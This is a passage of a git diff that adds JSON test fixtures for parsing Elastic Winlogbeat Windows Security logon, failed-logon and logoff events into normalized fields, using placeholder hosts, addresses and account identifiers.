Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process \",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}", + "event": { + "action": "authentication_network", + "category": [ + "authentication" + ], + "code": "4624", + "kind": "event", + "module": "security", + "original": "An account was successfully logged on.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tWS-USER-01$\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3E7\n\nLogon Information:\n\tLogon Type:\t\t3\n\tRestricted Admin Mode:\t-\n\tVirtual Account:\t\tNo\n\tElevated Token:\t\tNo\n\nImpersonation Level:\t\tImpersonation\n\nNew Logon:\n\tSecurity ID:\t\tS-4-5-6\n\tAccount Name:\t\ttarget_user\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0xFCEBB74A\n\tLinked Logon ID:\t\t0x0\n\tNetwork Account Name:\t-\n\tNetwork Account Domain:\t-\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\n\nProcess Information:\n\tProcess ID:\t\t0x2f0\n\tProcess Name:\t\tC:\\Windows\\System32\\executable.exe\n\nNetwork Information:\n\tWorkstation Name:\tWS-USER-01\n\tSource Network Address:\t1.2.3.4\n\tSource Port:\t\t29051\n\nDetailed Authentication Information:\n\tLogon Process:\t\tProcess \n\tAuthentication Package:\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\n\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\n\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\n\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.", + "type": [ + "start" + ] + }, + "@timestamp": "2024-11-12T08:41:05.803000Z", + "action": { + "id": 4624, + "outcome": "success", + "properties": { + "AuthenticationPackageName": "MICROSOFT_AUTHENTICATION_PACKAGE_V1_0", + "ElevatedToken": "%%1843", + "ImpersonationLevel": "%%1833", + "IpAddress": "1.2.3.4", + "IpPort": "29051", + "KeyLength": "0", + "LmPackageName": "-", + "LogonGuid": "{00000000-0000-0000-0000-000000000000}", + "LogonProcessName": "Process ", + "LogonType": "3", + "ProcessId": "0x2f0", + "ProcessName": "C:\\Windows\\System32\\executable.exe", + "RestrictedAdminMode": "-", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "WS-USER-01$", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetLinkedLogonId": "0x0", + "TargetLogonId": "0xfcebb74a", + "TargetOutboundDomainName": "-", + "TargetOutboundUserName": "-", + "TargetUserName": "target_user", + "TargetUserSid": "S-4-5-6", + "TransmittedServices": "-", + "VirtualAccount": "%%1843", + "WorkstationName": "WS-USER-01" + } + }, + "agent": { + "ephemeral_id": "12345678-1234-5678-9012-123456789012", + "id": "abcd1234-abcd-1234-ef56-abcdef123456", + "type": "winlogbeat", + "version": "7.0.0" + }, + "client": { + "ip": "1.2.3.4" + }, + "host": { + "architecture": "x86_64", + "hostname": "hostname", + "id": "abcdefab-1234-5678-9012-abcdefabcdef", + "name": "hostname", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Datacenter", + "platform": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "hostname" + ] + }, + "sekoiaio": { + "authentication": { + "process": { + "name": "Process " + } + }, + "client": { + "name": "WS-USER-01", + "os": { + "type": "windows" + } + }, + "server": { + "name": "hostname", + "os": { + "type": "windows" + } + } + }, + "user": { + "id": "S-1-2-3", + "name": "WS-USER-01$", + "target": { + "domain": "DOMAIN", + "id": "S-4-5-6", + "name": "target_user" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "hostname.company.com", + "event_id": "4624", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x3e7", + "type": "Network" + }, + "opcode": "Info", + "process": { + "pid": 752, + "thread": { + "id": 7960 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "1170100815", + "task": "Logon", + "version": 2 + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4625.json b/Beats/winlogbeat/tests/security_event_4625.json new file mode 100644 index 000000000..ac5882d46 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4625.json @@ -0,0 +1,193 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}" + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}", + "event": { + "action": "authentication_network", + "category": [ + "authentication" + ], + "code": "4625", + "kind": "event", + "module": "security", + "outcome": "failure", + "provider": "Microsoft-Windows-Security-Auditing", + "reason": "user_not_exist", + "type": [ + "start" + ] + }, + "@timestamp": "2024-11-12T08:40:34.260000Z", + "action": { + "id": 4625, + "outcome": "failure", + "properties": { + "AuthenticationPackageName": "Kerberos", + "FailureReason": "%%2313", + "IpAddress": "-", + "IpPort": "-", + "KeyLength": "0", + "LmPackageName": "-", + "LogonProcessName": "Channel", + "LogonType": "3", + "ProcessId": "0x338", + "ProcessName": "C:\\Windows\\System32\\executable.exe", + "Status": "0xc000006d", + "SubStatus": "0xc0000064", + "SubjectDomainName": "J_DOE", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "WORKSTATION$", + "SubjectUserSid": "S-1-2-3", + "TargetUserSid": "S-1-0-0", + "TransmittedServices": "-", + "WorkstationName": "WORKSTATION" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "name": "WORKSTATION", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "hostname", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "fe80::1111:2222:3333:4444", + "fe80::1234:5678:90ab:cde", + "fe80::1234:abcd:ef", + "fe80::a0b1:c2d:3e4", + "fe80::aaaa:bbbb:cccc:dddd", + "fe80::abcd:1234:567" + ], + "mac": [ + "00-00-00-00-00-00-00-00", + "11-11-11-11-11-11", + "A0-B1-C2-D3-E4-F5", + "AA-BB-CC-DD-EE-FF" + ], + "name": "hostname", + "os": { + "build": "14393.7428", + "family": "windows", + "kernel": "10.0.14393.7426 (rs1_release.240926-1524)", + "name": "Windows Server 2016 Datacenter", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "process": { + "executable": "C:\\Windows\\System32\\executable.exe", + "name": "executable.exe", + "pid": 824 + }, + "related": { + "hosts": [ + "WORKSTATION", + "hostname" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "fe80::1111:2222:3333:4444", + "fe80::1234:5678:90ab:cde", + "fe80::1234:abcd:ef", + "fe80::a0b1:c2d:3e4", + "fe80::aaaa:bbbb:cccc:dddd", + "fe80::abcd:1234:567" + ] + }, + "sekoiaio": { + "authentication": { + "process": { + "name": "Channel" + } + }, + "client": { + "name": "WORKSTATION", + "os": { + "type": "windows" + } + }, + "server": { + "name": "hostname", + "os": { + "type": "windows" + } + } + }, + "server": { + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "fe80::1111:2222:3333:4444", + "fe80::1234:5678:90ab:cde", + "fe80::1234:abcd:ef", + "fe80::a0b1:c2d:3e4", + "fe80::aaaa:bbbb:cccc:dddd", + "fe80::abcd:1234:567" + ] + }, + "source": { + "address": "WORKSTATION", + "domain": "WORKSTATION", + "port": 0 + }, + "user": { + "id": "S-1-2-3", + "name": "WORKSTATION$", + "target": { + "id": "S-1-0-0" + } + }, + "winlog": { + "activity_id": "{12345678-abcd-efab-cdef-123456789012}", + "api": "wineventlog", + "channel": "Security", + "computer_name": "WORKSTATION.johndoe.com", + "event_id": "4625", + "keywords": [ + "Audit Failure" + ], + "logon": { + "failure": { + "reason": "Unknown user name or bad password.", + "status": "This is either due to a bad username or authentication information", + "sub_status": "User logon with misspelled or bad user account" + }, + "id": "0x3e7", + "type": "Network" + }, + "opcode": "Info", + "process": { + "pid": 824, + "thread": { + "id": 28936 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "2552812283", + "task": "Logon" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4634.json b/Beats/winlogbeat/tests/security_event_4634.json new file mode 100644 index 000000000..ddc69e63b --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4634.json @@ -0,0 +1,112 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}" + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}", + "event": { + "action": "Logoff", + "code": "4634", + "kind": "event", + "module": "security", + "original": "An account was logged off.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tJ_DOE\n\tLogon ID:\t\t0x5ED35BB6\n\nLogon Type:\t\t\t3\n\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:42:47.895000Z", + "action": { + "id": 4634, + "outcome": "success", + "properties": { + "LogonType": "3", + "TargetDomainName": "J_DOE", + "TargetLogonId": "0x5ed35bb6", + "TargetUserName": "ACCOUNT", + "TargetUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "ACCOUNT" + ] + }, + "user": { + "domain": "J_DOE", + "id": "S-1-2-3", + "name": "ACCOUNT", + "target": { + "domain": "J_DOE", + "name": "ACCOUNT" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.jdoe.com", + "event_id": "4634", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x5ed35bb6", + "type": "Network" + }, + "opcode": "Info", + "process": { + "pid": 704, + "thread": { + "id": 6336 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "15983780774", + "task": "Logoff" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4662.json b/Beats/winlogbeat/tests/security_event_4662.json new file mode 100644 index 000000000..3d80320f5 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4662.json @@ -0,0 +1,105 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject 